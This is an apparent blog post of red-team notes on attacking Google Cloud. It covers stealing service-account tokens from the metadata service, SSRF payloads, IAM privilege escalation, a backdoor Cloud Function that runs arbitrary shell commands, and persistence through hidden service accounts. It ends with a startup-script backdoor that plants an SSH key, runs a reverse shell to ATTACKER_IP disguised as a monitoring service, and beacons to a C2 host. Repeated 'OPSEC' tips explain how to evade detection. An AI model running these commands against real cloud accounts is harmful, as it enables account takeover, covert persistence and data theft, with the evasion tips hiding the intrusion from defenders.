Skip to main content

Cloud VAPT Notes (GCP PrivEsc, Persistence, Evasion)

6766 words
Edwin Tok | Shiro
Author
Edwin Tok | Shiro
「 ✦ OwO ✦ 」
Table of Contents

Cloud Pentesting (GCP)
#


GCP - Metadata Service & Privilege Escalation
#

GCP Metadata Service Exploitation
#

Compute Engine Metadata Service:
#

# GCP Metadata Service endpoint (similar to AWS/Azure)
# Accessible from Compute Engine VMs, GKE nodes, App Engine flexible

# METADATA SERVICE V1 (Legacy - simpler but less secure):

# Get all metadata
curl "http://metadata.google.internal/computeMetadata/v1/?recursive=true" \
    -H "Metadata-Flavor: Google"

# Alternative IP address
curl "http://169.254.169.254/computeMetadata/v1/?recursive=true" \
    -H "Metadata-Flavor: Google"

# Get project ID
curl "http://metadata.google.internal/computeMetadata/v1/project/project-id" \
    -H "Metadata-Flavor: Google"

# Get project number
curl "http://metadata.google.internal/computeMetadata/v1/project/numeric-project-id" \
    -H "Metadata-Flavor: Google"

# Get instance information
curl "http://metadata.google.internal/computeMetadata/v1/instance/name" \
    -H "Metadata-Flavor: Google"

curl "http://metadata.google.internal/computeMetadata/v1/instance/zone" \
    -H "Metadata-Flavor: Google"

# Get instance attributes (may contain secrets)
curl "http://metadata.google.internal/computeMetadata/v1/instance/attributes/?recursive=true" \
    -H "Metadata-Flavor: Google"

# Get network information
curl "http://metadata.google.internal/computeMetadata/v1/instance/network-interfaces/0/access-configs/0/external-ip" \
    -H "Metadata-Flavor: Google"

# CRITICAL: Get service account tokens
curl "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token" \
    -H "Metadata-Flavor: Google"

# List all available service accounts
curl "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/" \
    -H "Metadata-Flavor: Google"

# Get token for specific service account
curl "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/SA_EMAIL/token" \
    -H "Metadata-Flavor: Google"

# Get service account email
curl "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/email" \
    -H "Metadata-Flavor: Google"

# Get service account scopes (shows what APIs token can access)
curl "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/scopes" \
    -H "Metadata-Flavor: Google"

# Get identity token (for authenticated Cloud Run, Cloud Functions)
curl "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/identity?audience=https://example.com" \
    -H "Metadata-Flavor: Google"

# Get SSH keys (project-wide or instance-specific)
curl "http://metadata.google.internal/computeMetadata/v1/project/attributes/ssh-keys" \
    -H "Metadata-Flavor: Google"

curl "http://metadata.google.internal/computeMetadata/v1/instance/attributes/ssh-keys" \
    -H "Metadata-Flavor: Google"

# Get startup/shutdown scripts (may contain credentials)
curl "http://metadata.google.internal/computeMetadata/v1/instance/attributes/startup-script" \
    -H "Metadata-Flavor: Google"

curl "http://metadata.google.internal/computeMetadata/v1/instance/attributes/shutdown-script" \
    -H "Metadata-Flavor: Google"

# OPSEC: Metadata access requires "Metadata-Flavor: Google" header
# No authentication needed from within GCP compute resources
# Access doesn't generate logs (unlike API calls)
# Tokens typically valid for 1 hour

SSRF to Metadata Service:
#

# GCP metadata requires custom header "Metadata-Flavor: Google"
# SSRF exploitation depends on ability to inject headers

# If you can control headers in SSRF:
GET http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
Header: Metadata-Flavor: Google

# URL-encoded header injection attempts:
http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token%0d%0aMetadata-Flavor:%20Google

# HTTP parameter pollution (if vulnerable):
http://vulnerable-app.com/fetch?url=http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token&headers[Metadata-Flavor]=Google

# DNS rebinding attack (advanced):
# 1. Create domain that resolves to public IP initially
# 2. After DNS check, rebind to 169.254.169.254
# 3. Application fetches from metadata service

# Webhook-based SSRF (if application processes webhooks):
POST /webhook-handler
Content-Type: application/json
{
  "callback_url": "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token",
  "headers": {
    "Metadata-Flavor": "Google"
  }
}

# OPSEC: GCP metadata header requirement makes SSRF harder than AWS IMDSv1
# Look for header injection vulnerabilities
# Some frameworks may automatically add headers from query parameters

Using Retrieved Access Tokens:
#

# Extract access token from metadata response
TOKEN=$(curl -s "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token" \
    -H "Metadata-Flavor: Google" | jq -r '.access_token')

# Check token expiration
curl -s "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token" \
    -H "Metadata-Flavor: Google" | jq '.expires_in'

# Use token with gcloud CLI
gcloud auth activate-service-account --access-token-file=<(echo $TOKEN)

# Or set as environment variable
export GOOGLE_OAUTH_ACCESS_TOKEN=$TOKEN

# Use token for direct API calls
curl -H "Authorization: Bearer $TOKEN" \
    "https://compute.googleapis.com/compute/v1/projects/PROJECT_ID/zones"

# Test token permissions
curl -H "Authorization: Bearer $TOKEN" \
    "https://www.googleapis.com/oauth2/v1/tokeninfo?access_token=$TOKEN"

# Get service account details from token
curl "https://www.googleapis.com/oauth2/v3/tokeninfo?access_token=$TOKEN"

# Response includes:
# - email: Service account email
# - scope: Granted OAuth scopes
# - expires_in: Time until expiration
# - azp: Authorized party (project number)

# Use token to list resources
curl -H "Authorization: Bearer $TOKEN" \
    "https://cloudresourcemanager.googleapis.com/v1/projects"

# OPSEC: Tokens from metadata service inherit VM's service account permissions
# Default compute service account often has Project Editor role (very powerful)
# Token usage appears as service account in logs (harder to attribute to attacker)

GKE Metadata Service (Kubernetes-specific):
#

# GKE nodes also have metadata service access
# Workload Identity (modern) vs Service Account keys (legacy)

# WORKLOAD IDENTITY (Recommended, newer):
# Pods use Kubernetes service accounts mapped to GCP service accounts
# Metadata service returns tokens for mapped GCP SA

# Check if Workload Identity is enabled
kubectl get mutatingwebhookconfigurations workload-identity-webhook -o yaml

# From within a GKE pod with Workload Identity:
curl "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token" \
    -H "Metadata-Flavor: Google"

# LEGACY SERVICE ACCOUNT KEYS:
# Older GKE clusters may mount SA keys as secrets
# Check for mounted service account keys
kubectl get secrets --all-namespaces -o json | \
    jq '.items[] | select(.type=="kubernetes.io/service-account-token")'

# Look for keys in default locations
ls -la /var/run/secrets/kubernetes.io/serviceaccount/
cat /var/run/secrets/kubernetes.io/serviceaccount/token

# OPSEC: GKE metadata access same as Compute Engine
# Workload Identity is more secure but still exploitable
# Container escape may be needed to access node metadata

App Engine & Cloud Functions Metadata:
#

# App Engine Flexible and Cloud Functions also have metadata access
# Cloud Functions (2nd gen) use Cloud Run, which has similar metadata

# From Cloud Function (1st gen):
import requests
from google.auth.transport.requests import Request
from google.oauth2 import id_token

# Get access token
metadata_url = 'http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token'
headers = {'Metadata-Flavor': 'Google'}
response = requests.get(metadata_url, headers=headers)
token = response.json()['access_token']

# From Cloud Run / Cloud Functions (2nd gen):
# Same metadata service available
# curl commands work identically

# OPSEC: Serverless functions often have elevated permissions
# Metadata access from serverless is common pattern
# Harder to detect than direct VM compromise

Privilege Escalation Techniques
#

1. Service Account Key Creation (Most Common):
#

# Scenario: You have iam.serviceAccountKeys.create permission
# Create key for high-privilege service account

# List service accounts
gcloud iam service-accounts list --project=PROJECT_ID

# Identify high-privilege service accounts
gcloud projects get-iam-policy PROJECT_ID \
    --flatten="bindings[].members" \
    --filter="bindings.role:roles/owner OR bindings.role:roles/editor" \
    | grep serviceAccount

# Create key for target service account
gcloud iam service-accounts keys create key.json \
    --iam-account=TARGET_SA@PROJECT_ID.iam.gserviceaccount.com \
    --project=PROJECT_ID

# Authenticate with new key
gcloud auth activate-service-account --key-file=key.json

# Verify elevated permissions
gcloud projects get-iam-policy PROJECT_ID

# OPSEC: Key creation is logged in Cloud Audit Logs
# Keys never expire unless manually deleted
# Create keys with service-account-like names
# Store keys in Cloud Storage or Secrets Manager (looks legitimate)

2. Service Account Impersonation:
#

# Scenario: You have iam.serviceAccounts.getAccessToken or iam.serviceAccounts.actAs
# Impersonate service account without creating keys

# Test impersonation capability
gcloud iam service-accounts get-access-token TARGET_SA@PROJECT_ID.iam.gserviceaccount.com

# If successful, use impersonation flag for all commands
gcloud compute instances list \
    --impersonate-service-account=TARGET_SA@PROJECT_ID.iam.gserviceaccount.com \
    --project=PROJECT_ID

# Generate short-lived token as impersonated SA
gcloud auth print-access-token \
    --impersonate-service-account=TARGET_SA@PROJECT_ID.iam.gserviceaccount.com

# Chain impersonation (SA1 impersonates SA2, SA2 impersonates SA3)
gcloud compute instances list \
    --impersonate-service-account=TARGET_SA3@PROJECT_ID.iam.gserviceaccount.com \
    --impersonate-service-account=TARGET_SA2@PROJECT_ID.iam.gserviceaccount.com \
    --impersonate-service-account=TARGET_SA1@PROJECT_ID.iam.gserviceaccount.com

# Generate access token via API (alternative method)
curl -X POST \
    -H "Authorization: Bearer $(gcloud auth print-access-token)" \
    -H "Content-Type: application/json" \
    -d '{"scope":["https://www.googleapis.com/auth/cloud-platform"]}' \
    "https://iamcredentials.googleapis.com/v1/projects/-/serviceAccounts/TARGET_SA@PROJECT_ID.iam.gserviceaccount.com:generateAccessToken"

# OPSEC: Impersonation is logged showing both impersonator and target
# Short-lived tokens (1 hour) require repeated impersonation
# More stealthy than key creation (no persistent credentials)
# Common in CI/CD and automation (blends in)

3. IAM Policy Modification (Project/Org Level):
#

# Scenario: You have resourcemanager.projects.setIamPolicy (Owner role)
# Add yourself or service account to privileged role

# Get current IAM policy
gcloud projects get-iam-policy PROJECT_ID --format=json > policy.json

# Edit policy.json to add binding:
# {
#   "role": "roles/owner",
#   "members": [
#     "user:attacker@gmail.com"
#   ]
# }

# Apply modified policy
gcloud projects set-iam-policy PROJECT_ID policy.json

# Or use add-iam-policy-binding (simpler)
gcloud projects add-iam-policy-binding PROJECT_ID \
    --member="user:attacker@gmail.com" \
    --role="roles/owner"

# Add service account to privileged role
gcloud projects add-iam-policy-binding PROJECT_ID \
    --member="serviceAccount:backdoor@PROJECT_ID.iam.gserviceaccount.com" \
    --role="roles/editor"

# Organization-level escalation (if you have permissions)
gcloud organizations add-iam-policy-binding ORGANIZATION_ID \
    --member="user:attacker@gmail.com" \
    --role="roles/resourcemanager.organizationAdmin"

# OPSEC: IAM policy changes are heavily logged
# Changes generate immediate alerts in security-conscious orgs
# Use less obvious roles: "roles/iam.serviceAccountUser", "roles/iam.securityReviewer"
# Conditional bindings can hide escalation behind specific conditions

4. Compute Instance Metadata Modification:
#

# Scenario: You have compute.instances.setMetadata permission
# Add SSH keys or startup scripts to existing instances

# Get current instance metadata
gcloud compute instances describe INSTANCE_NAME \
    --zone=ZONE \
    --project=PROJECT_ID \
    --format=json

# Add SSH public key to instance
gcloud compute instances add-metadata INSTANCE_NAME \
    --zone=ZONE \
    --metadata=ssh-keys="attacker:ssh-rsa AAAAB3NzaC1yc2E... attacker@kali" \
    --project=PROJECT_ID

# Add startup script (executes on reboot)
gcloud compute instances add-metadata INSTANCE_NAME \
    --zone=ZONE \
    --metadata-from-file=startup-script=backdoor.sh \
    --project=PROJECT_ID

# Project-wide SSH keys (affects all instances)
gcloud compute project-info add-metadata \
    --metadata=ssh-keys="attacker:ssh-rsa AAAAB3NzaC1yc2E... attacker@kali" \
    --project=PROJECT_ID

# Modify instance service account (if you have permissions)
gcloud compute instances set-service-account INSTANCE_NAME \
    --zone=ZONE \
    --service-account=PRIVILEGED_SA@PROJECT_ID.iam.gserviceaccount.com \
    --scopes=https://www.googleapis.com/auth/cloud-platform \
    --project=PROJECT_ID

# OPSEC: Metadata changes are logged
# Project-wide SSH keys affect many instances (more visible)
# Startup scripts only execute on reboot (may need to wait or force reboot)
# Service account change requires instance restart

5. Cloud Storage Bucket IAM Escalation:
#

# Scenario: You have storage.buckets.setIamPolicy permission
# Grant yourself access to sensitive buckets

# List buckets
gsutil ls -p PROJECT_ID

# Get bucket IAM policy
gsutil iam get gs://BUCKET_NAME

# Add yourself to bucket IAM
gsutil iam ch user:attacker@gmail.com:objectViewer gs://BUCKET_NAME

# Or grant storage admin (full control)
gsutil iam ch user:attacker@gmail.com:admin gs://BUCKET_NAME

# Make bucket public (if you want to exfiltrate later)
gsutil iam ch allUsers:objectViewer gs://BUCKET_NAME

# Check for buckets with sensitive data
for bucket in $(gsutil ls -p PROJECT_ID | grep gs://); do
    echo "Checking: $bucket"
    gsutil ls -r $bucket | grep -iE '(password|secret|key|credential|backup|database|prod)'
done

# OPSEC: Bucket IAM changes are logged
# Public buckets may trigger DLP or security alerts
# Use objectViewer (read-only) instead of admin to be less obvious

6. Cloud Functions / Cloud Run Deployment:
#

# Scenario: You have cloudfunctions.functions.create or run.services.create
# Deploy backdoor function/service with elevated service account

# Create backdoor Cloud Function
cat > main.py << 'EOF'
import functions_framework
import subprocess
import json

@functions_framework.http
def backdoor(request):
    request_json = request.get_json(silent=True)
    
    # Simple authentication
    if request_json and request_json.get('token') == 'SECRET_TOKEN':
        cmd = request_json.get('cmd', 'gcloud projects list')
        result = subprocess.run(cmd, shell=True, capture_output=True, text=True)
        return json.dumps({'output': result.stdout, 'error': result.stderr})
    
    return 'Unauthorized', 403
EOF

# Deploy with elevated service account
gcloud functions deploy backdoor-function \
    --runtime=python311 \
    --trigger-http \
    --allow-unauthenticated \
    --service-account=PRIVILEGED_SA@PROJECT_ID.iam.gserviceaccount.com \
    --region=us-central1 \
    --project=PROJECT_ID

# Get function URL
gcloud functions describe backdoor-function \
    --region=us-central1 \
    --format="value(httpsTrigger.url)"

# Test function
curl -X POST "https://REGION-PROJECT_ID.cloudfunctions.net/backdoor-function" \
    -H "Content-Type: application/json" \
    -d '{"token":"SECRET_TOKEN","cmd":"gcloud compute instances list"}'

# OPSEC: Function deployment is logged
# Use benign function names: "health-check", "webhook-handler", "api-gateway"
# Unauthenticated functions are common (but risky for backdoors)
# Add basic authentication to avoid accidental discovery

7. Deployment Manager / Terraform Abuse:
#

# Scenario: You have deploymentmanager.deployments.create
# Deploy infrastructure with backdoors

# Create Deployment Manager template
cat > deployment.yaml << 'EOF'
resources:
- name: backdoor-sa
  type: iam.v1.serviceAccount
  properties:
    accountId: backup-automation
    displayName: Backup Automation Service Account
    
- name: backdoor-sa-key
  type: iam.v1.serviceAccounts.key
  properties:
    parent: $(ref.backdoor-sa.name)
    privateKeyType: TYPE_GOOGLE_CREDENTIALS_FILE
    
- name: backdoor-sa-binding
  type: cloudresourcemanager.v1.projectIamBinding
  properties:
    projectId: PROJECT_ID
    role: roles/editor
    members:
    - serviceAccount:$(ref.backdoor-sa.email)
    
outputs:
- name: serviceAccountKey
  value: $(ref.backdoor-sa-key.privateKeyData)
EOF

# Deploy
gcloud deployment-manager deployments create backdoor-deployment \
    --config=deployment.yaml \
    --project=PROJECT_ID

# Get outputs (service account key)
gcloud deployment-manager deployments describe backdoor-deployment \
    --project=PROJECT_ID

# OPSEC: Deployment Manager creates multiple resources in one operation
# Outputs can expose credentials
# Use infrastructure-themed names
# Templates can be complex, hiding malicious resources

8. Cloud SQL / Secret Manager Access:
#

# Scenario: You have cloudsql.instances.* or secretmanager.secrets.* permissions

# CLOUD SQL:

# List SQL instances
gcloud sql instances list --project=PROJECT_ID

# Get instance connection name
gcloud sql instances describe INSTANCE_NAME \
    --project=PROJECT_ID \
    --format="value(connectionName)"

# Create Cloud SQL user (if you have permissions)
gcloud sql users create backdoor \
    --instance=INSTANCE_NAME \
    --password=P@ssw0rd123 \
    --project=PROJECT_ID

# Connect to Cloud SQL (via Cloud SQL Proxy)
cloud_sql_proxy -instances=CONNECTION_NAME=tcp:3306 &
mysql -h 127.0.0.1 -u backdoor -pP@ssw0rd123

# Export database
gcloud sql export sql INSTANCE_NAME gs://BUCKET_NAME/database-backup.sql \
    --database=DATABASE_NAME \
    --project=PROJECT_ID

# SECRET MANAGER:

# List secrets
gcloud secrets list --project=PROJECT_ID

# Access secret values
gcloud secrets versions access latest \
    --secret=SECRET_NAME \
    --project=PROJECT_ID

# Create new secret (for persistence)
echo "attacker-credential" | gcloud secrets create backdoor-credential \
    --data-file=- \
    --replication-policy=automatic \
    --project=PROJECT_ID

# Grant yourself access to secret
gcloud secrets add-iam-policy-binding SECRET_NAME \
    --member="user:attacker@gmail.com" \
    --role="roles/secretmanager.secretAccessor" \
    --project=PROJECT_ID

# OPSEC: Secret access is logged with secret name
# Database exports are large and may be monitored
# Create secrets with benign names: "api-key-staging", "db-connection-string"

9. BigQuery Data Exfiltration:
#

# Scenario: You have bigquery.tables.getData or bigquery.jobs.create

# List datasets
bq ls --project_id=PROJECT_ID

# List tables in dataset
bq ls --project_id=PROJECT_ID DATASET_ID

# Query table
bq query --use_legacy_sql=false \
    'SELECT * FROM `PROJECT_ID.DATASET_ID.TABLE_ID` LIMIT 100'

# Export table to Cloud Storage
bq extract \
    --destination_format=CSV \
    PROJECT_ID:DATASET_ID.TABLE_ID \
    gs://BUCKET_NAME/extracted-data.csv

# Create external table pointing to your bucket (data siphon)
bq mk --external_table_definition=@CSV=gs://ATTACKER_BUCKET/data.csv \
    PROJECT_ID:DATASET_ID.exfiltrated_data

# OPSEC: BigQuery queries are logged with full SQL
# Large data exports may trigger DLP scans
# Use queries that look like analytics: "SELECT COUNT(*)", aggregations
# Export during business hours when data movement is normal

10. Workload Identity Federation Abuse:
#

# Scenario: Workload Identity Pool is misconfigured
# External identity (GitHub, AWS, Azure) can authenticate to GCP

# Check Workload Identity configuration
gcloud iam workload-identity-pools describe POOL_ID \
    --location=global \
    --project=PROJECT_ID

# Get provider details
gcloud iam workload-identity-pools providers describe PROVIDER_ID \
    --workload-identity-pool=POOL_ID \
    --location=global \
    --project=PROJECT_ID

# Look for weak attribute conditions
# Example vulnerable config:
# attributeCondition: "assertion.repository_owner=='target-org'"
# Can be bypassed by creating org with similar name

# Authenticate from external identity
# (Requires controlling external identity provider: GitHub Actions, AWS, etc.)

# Example: GitHub Actions workflow
# .github/workflows/exploit.yml
# Uses workload_identity_provider to get GCP token

# OPSEC: Workload Identity Federation is newer, may be less monitored
# Attribute mappings may have weak validation
# External identity authentication generates different log patterns

GCP - Automated Tools & Persistence
#

Automated Reconnaissance Tools
#

GCP-IAM-Privilege-Escalation (Comprehensive Enumeration):
#

# Installation
git clone https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation.git
cd GCP-IAM-Privilege-Escalation
pip3 install -r requirements.txt

# Authenticate first
gcloud auth login

# Enumerate permissions for current user/service account
python3 enumerate_member_permissions.py -p PROJECT_ID

# Output shows:
# - All permissions current identity has
# - Services accessible
# - Potential privilege escalation paths

# Check for privilege escalation opportunities
python3 check_for_privesc.py -p PROJECT_ID

# Output identifies:
# - Service accounts you can impersonate
# - Service accounts you can create keys for
# - Resources you can modify for escalation
# - IAM policies you can change

# Exploit specific privilege escalation method
# Example: Create service account key
python3 ExploitScripts/iam.serviceAccountKeys.create.py \
    -p PROJECT_ID \
    -s TARGET_SA@PROJECT_ID.iam.gserviceaccount.com

# Example: Impersonate service account
python3 ExploitScripts/iam.serviceAccounts.implicitDelegation.py \
    -p PROJECT_ID \
    -s TARGET_SA@PROJECT_ID.iam.gserviceaccount.com

# OPSEC: Enumeration scripts make many API calls
# Use during business hours to blend in
# Scripts identify exact escalation paths (saves manual testing)

CloudFox GCP Module:
#

# Download CloudFox
wget https://github.com/BishopFox/cloudfox/releases/latest/download/cloudfox-linux-amd64
chmod +x cloudfox-linux-amd64
mv cloudfox-linux-amd64 /usr/local/bin/cloudfox

# Full GCP assessment
cloudfox gcp --project PROJECT_ID all-checks

# Individual modules:

# IAM enumeration
cloudfox gcp --project PROJECT_ID iam
# Shows: Users, service accounts, roles, permissions

# Service account analysis
cloudfox gcp --project PROJECT_ID service-accounts
# Identifies: High-privilege SAs, impersonation opportunities

# Compute resources
cloudfox gcp --project PROJECT_ID instances
# Lists: VMs, external IPs, service accounts attached

# Storage enumeration
cloudfox gcp --project PROJECT_ID buckets
# Shows: Bucket permissions, public access, sensitive files

# Network analysis
cloudfox gcp --project PROJECT_ID networks
# Maps: VPCs, firewall rules, external access

# Secret enumeration
cloudfox gcp --project PROJECT_ID secrets
# Lists: Secret Manager secrets you can access

# Generate visual attack graph
cloudfox gcp --project PROJECT_ID graph

# Output to specific directory
cloudfox gcp --project PROJECT_ID all-checks --output-dir ./gcp-recon

# OPSEC: CloudFox generates comprehensive reports
# Read-only operations (safe for enumeration)
# Markdown output easy to review offline

ScoutSuite GCP Module:
#

# Installation
pip install scoutsuite

# Run GCP scan
scout gcp --project-id PROJECT_ID

# Scan multiple projects
scout gcp --project-id PROJECT_ID1,PROJECT_ID2,PROJECT_ID3

# Use specific credentials
scout gcp --project-id PROJECT_ID --service-account SA_KEY.json

# Custom ruleset
scout gcp --project-id PROJECT_ID --ruleset custom-rules.json

# No browser (headless)
scout gcp --project-id PROJECT_ID --no-browser

# Output directory
scout gcp --project-id PROJECT_ID --report-dir ./scout-gcp-report

# ScoutSuite checks:
# - IAM overly permissive roles
# - Service account key age
# - Compute Engine public IPs
# - Storage bucket public access
# - Cloud SQL instances without backups
# - Firewall rules allowing 0.0.0.0/0
# - Cloud Functions/Cloud Run unauthenticated
# - KMS key rotation
# - Logging and monitoring gaps

# OPSEC: Comprehensive security assessment tool
# Generates many API calls (use with caution)
# HTML report categorizes findings by severity

GCPBucketBrute (External Storage Enumeration):
#

# Installation
git clone https://github.com/RhinoSecurityLabs/GCPBucketBrute.git
cd GCPBucketBrute

# Basic brute force
python3 gcpbucketbrute.py -k keywords.txt -w wordlist.txt

# Use company name as seed
python3 gcpbucketbrute.py -k company-name -w wordlist.txt

# Check for public access
python3 gcpbucketbrute.py -k keywords.txt -w wordlist.txt --check-access

# Output to file
python3 gcpbucketbrute.py -k keywords.txt -w wordlist.txt -o found-buckets.txt

# Common naming patterns:
# - company-name-backups
# - projectid-logs
# - company-prod-data
# - projectid-terraform-state
# - company-artifacts
# - projectid-cloudbuild

# OPSEC: External reconnaissance (no authentication)
# No logs generated in target GCP project
# Rate limit requests to avoid detection

Custom GCP Enumeration Script:
#

#!/bin/bash
# GCP Red Team Enumeration Script
# Usage: ./gcp-enum.sh PROJECT_ID

PROJECT_ID=$1
OUTPUT_DIR="gcp-enum-${PROJECT_ID}"

echo "[*] GCP Red Team Enumeration"
echo "[*] Project: $PROJECT_ID"
echo "[*] Date: $(date)"
echo ""

# Create output directory
mkdir -p $OUTPUT_DIR

# Current identity
echo "[+] Current Identity:"
gcloud config get-value account | tee $OUTPUT_DIR/identity.txt

# Project info
echo ""
echo "[+] Project Information:"
gcloud projects describe $PROJECT_ID | tee $OUTPUT_DIR/project-info.txt

# IAM Policy
echo ""
echo "[+] Project IAM Policy:"
gcloud projects get-iam-policy $PROJECT_ID --format=json | \
    tee $OUTPUT_DIR/iam-policy.json

# Service Accounts
echo ""
echo "[+] Service Accounts:"
gcloud iam service-accounts list --project=$PROJECT_ID | \
    tee $OUTPUT_DIR/service-accounts.txt

# High-privilege service accounts
echo ""
echo "[+] High-Privilege Service Accounts:"
gcloud projects get-iam-policy $PROJECT_ID \
    --flatten="bindings[].members" \
    --filter="bindings.role:roles/owner OR bindings.role:roles/editor" \
    --format="table(bindings.role,bindings.members)" | \
    grep serviceAccount | tee $OUTPUT_DIR/privileged-sas.txt

# Compute Instances
echo ""
echo "[+] Compute Engine Instances:"
gcloud compute instances list --project=$PROJECT_ID | \
    tee $OUTPUT_DIR/instances.txt

# Storage Buckets
echo ""
echo "[+] Cloud Storage Buckets:"
gsutil ls -p $PROJECT_ID | tee $OUTPUT_DIR/buckets.txt

# Check for public buckets
echo ""
echo "[+] Checking for Public Buckets:"
for bucket in $(gsutil ls -p $PROJECT_ID); do
    echo "Checking: $bucket"
    gsutil iam get $bucket 2>/dev/null | grep -q "allUsers\|allAuthenticatedUsers" && \
        echo "  [!] PUBLIC: $bucket" | tee -a $OUTPUT_DIR/public-buckets.txt
done

# Cloud Functions
echo ""
echo "[+] Cloud Functions:"
gcloud functions list --project=$PROJECT_ID | tee $OUTPUT_DIR/functions.txt

# Cloud Run Services
echo ""
echo "[+] Cloud Run Services:"
gcloud run services list --project=$PROJECT_ID | tee $OUTPUT_DIR/cloudrun.txt

# GKE Clusters
echo ""
echo "[+] GKE Clusters:"
gcloud container clusters list --project=$PROJECT_ID | tee $OUTPUT_DIR/gke-clusters.txt

# Cloud SQL Instances
echo ""
echo "[+] Cloud SQL Instances:"
gcloud sql instances list --project=$PROJECT_ID | tee $OUTPUT_DIR/sql-instances.txt

# Secret Manager Secrets
echo ""
echo "[+] Secret Manager Secrets:"
gcloud secrets list --project=$PROJECT_ID | tee $OUTPUT_DIR/secrets.txt

# Enabled APIs
echo ""
echo "[+] Enabled APIs:"
gcloud services list --enabled --project=$PROJECT_ID | tee $OUTPUT_DIR/enabled-apis.txt

# Firewall Rules
echo ""
echo "[+] Firewall Rules (Permissive):"
gcloud compute firewall-rules list --project=$PROJECT_ID \
    --filter="allowed[]:0.0.0.0/0" \
    --format="table(name,allowed[].ports,sourceRanges)" | \
    tee $OUTPUT_DIR/firewall-permissive.txt

# Service Account Impersonation Check
echo ""
echo "[+] Testing Service Account Impersonation:"
for sa in $(gcloud iam service-accounts list --format="value(email)" --project=$PROJECT_ID 2>/dev/null); do
    if gcloud iam service-accounts get-access-token $sa --project=$PROJECT_ID &>/dev/null; then
        echo "  [!] Can impersonate: $sa" | tee -a $OUTPUT_DIR/impersonatable-sas.txt
    fi
done

# Generate summary
cat > $OUTPUT_DIR/SUMMARY.txt << EOF
GCP Red Team Enumeration Summary
=================================
Project: $PROJECT_ID
Date: $(date)
Identity: $(gcloud config get-value account)

Resources Found:
- Service Accounts: $(wc -l < $OUTPUT_DIR/service-accounts.txt)
- Compute Instances: $(gcloud compute instances list --project=$PROJECT_ID --format="value(name)" | wc -l)
- Storage Buckets: $(gsutil ls -p $PROJECT_ID | wc -l)
- Cloud Functions: $(gcloud functions list --project=$PROJECT_ID --format="value(name)" | wc -l)
- GKE Clusters: $(gcloud container clusters list --project=$PROJECT_ID --format="value(name)" | wc -l)
- Secrets: $(gcloud secrets list --project=$PROJECT_ID --format="value(name)" | wc -l)

Key Findings:
$([ -f $OUTPUT_DIR/public-buckets.txt ] && echo "- Public buckets found" || echo "- No public buckets")
$([ -f $OUTPUT_DIR/impersonatable-sas.txt ] && echo "- Impersonatable service accounts found" || echo "- No impersonatable SAs")
$([ -f $OUTPUT_DIR/privileged-sas.txt ] && echo "- High-privilege service accounts identified")

Next Steps:
1. Review privileged-sas.txt for escalation opportunities
2. Check public-buckets.txt for sensitive data exposure
3. Test impersonatable-sas.txt for privilege escalation
4. Review firewall-permissive.txt for network access
5. Enumerate secrets.txt for credential access
EOF

echo ""
echo "[*] Enumeration Complete!"
echo "[*] Results saved to: $OUTPUT_DIR"
cat $OUTPUT_DIR/SUMMARY.txt

Make executable and run:

bash

chmod +x gcp-enum.sh
./gcp-enum.sh my-project-id

GCP Security Tools Comparison (2024-2025):

ToolFocusOutputStealthBest For
GCP-IAM-Priv-EscPrivilege escalationTextMediumFinding escalation paths
CloudFoxAttack pathsMarkdownHighComprehensive recon
ScoutSuiteSecurity auditHTMLLowCompliance assessment
GCPBucketBruteStorage enumTextVery HighExternal recon (unauthenticated)
Custom scriptsFlexibleVariousMediumTargeted enumeration

Persistence Mechanisms
#

1. Service Account with Long-Lived Key:
#

# Create inconspicuous service account
gcloud iam service-accounts create backup-automation \
    --display-name="Backup Automation Service" \
    --description="Automated backup and recovery service" \
    --project=PROJECT_ID

# Grant privileges
gcloud projects add-iam-policy-binding PROJECT_ID \
    --member="serviceAccount:backup-automation@PROJECT_ID.iam.gserviceaccount.com" \
    --role="roles/editor"

# Create key (never expires unless deleted)
gcloud iam service-accounts keys create backup-sa-key.json \
    --iam-account=backup-automation@PROJECT_ID.iam.gserviceaccount.com \
    --project=PROJECT_ID

# Store key in secure location
# Option 1: Cloud Storage (looks legitimate)
gsutil cp backup-sa-key.json gs://ATTACKER_BUCKET/keys/backup-sa.json

# Option 2: Secret Manager (more stealthy)
gcloud secrets create backup-service-key \
    --replication-policy=automatic \
    --data-file=backup-sa-key.json \
    --project=PROJECT_ID

# Test authentication
gcloud auth activate-service-account --key-file=backup-sa-key.json
gcloud projects list

# OPSEC: Service accounts are expected in production
# Keys never expire (persistent access)
# Name service accounts after legitimate services
# Store keys in Cloud Storage or Secret Manager (appears operational)

2. Compute Engine Startup Script Backdoor:
#

# Create backdoor startup script
cat > startup-backdoor.sh << 'EOF'
#!/bin/bash
# System initialization and monitoring

# Add SSH key for backdoor access
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQ... attacker@kali" >> /home/user/.ssh/authorized_keys

# Install reverse shell as systemd service
cat > /etc/systemd/system/gcp-monitor.service << 'SERVICE'
[Unit]
Description=GCP Monitoring Agent
After=network.target

[Service]
Type=simple
ExecStart=/bin/bash -c 'while true; do bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1; sleep 300; done'
Restart=always
RestartSec=30

[Install]
WantedBy=multi-user.target
SERVICE

systemctl daemon-reload
systemctl enable gcp-monitor.service
systemctl start gcp-monitor.service

# Beacon to C2
curl -X POST https://attacker-c2.com/beacon \
    -H "Content-Type: application/json" \
    -d "{\"hostname\":\"$(hostname)\",\"time\":\"$(date)\"}"
EOF

# Upload to Cloud Storage
gsutil cp startup-backdoor.sh gs://BUCKET_NAME/scripts/startup.sh

# Create VM with backdoor startup script
gcloud compute instances create backdoor-vm \
    --machine-type=e2-micro \
    --zone=us-central1-a \
    --metadata-from-file=startup-script=startup-backdoor.sh \
    --service-account=PRIVILEGED_SA@PROJECT_ID.iam.gserviceaccount.com \
    --scopes=cloud-platform \
